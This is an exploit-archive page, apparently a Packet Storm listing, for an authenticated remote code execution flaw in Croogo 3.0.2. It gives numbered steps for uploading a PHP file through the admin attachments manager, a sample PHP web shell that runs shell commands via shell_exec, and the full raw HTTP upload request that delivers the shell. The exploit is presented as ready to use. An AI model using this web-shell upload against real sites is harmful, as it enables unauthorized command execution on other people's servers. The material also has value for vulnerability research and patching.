Croogo 3.0.2 Remote Code Execution

Croogo 3.0.2 Remote Code Execution: Posted Dec 6, 2021; Authored by Deha Berkin Bir; Croogo version 3.0.2 suffers from an authenticated remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 69cb24321500a1eabe06fb8e754fc1e37bd8231ca7df47261d555d176c75139f; Download | Favorite | View

Croogo 3.0.2 Remote Code Execution

# Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)
# Date: 05/12/2021
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3

==> Tutorial <==

1- Login with your privileged account.
2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.
3- Click the 'New Attachment' button.
4- Choose a malicious php script and upload it.

########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################
<?php
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
############################################################################

5- Click on the URL of malicious php script you uploaded.
6- The malicious PHP script will be executed.


==> HTTP Request (File Upload) <==

POST /admin/file-manager/attachments/add HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694
Content-Length: 976
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/add
Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="_method"

POST
-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="_csrfToken"

bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb
-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="file"; filename="malicious.php"
Content-Type: application/octet-stream

<?php
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>

-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="_Token[fields]"

16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="_Token[unlocked]"


-----------------------------7028631106888453201670373694--

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Croogo 3.0.2 Remote Code Execution

Croogo 3.0.2 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Croogo 3.0.2 Remote Code Execution

Share This

Croogo 3.0.2 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems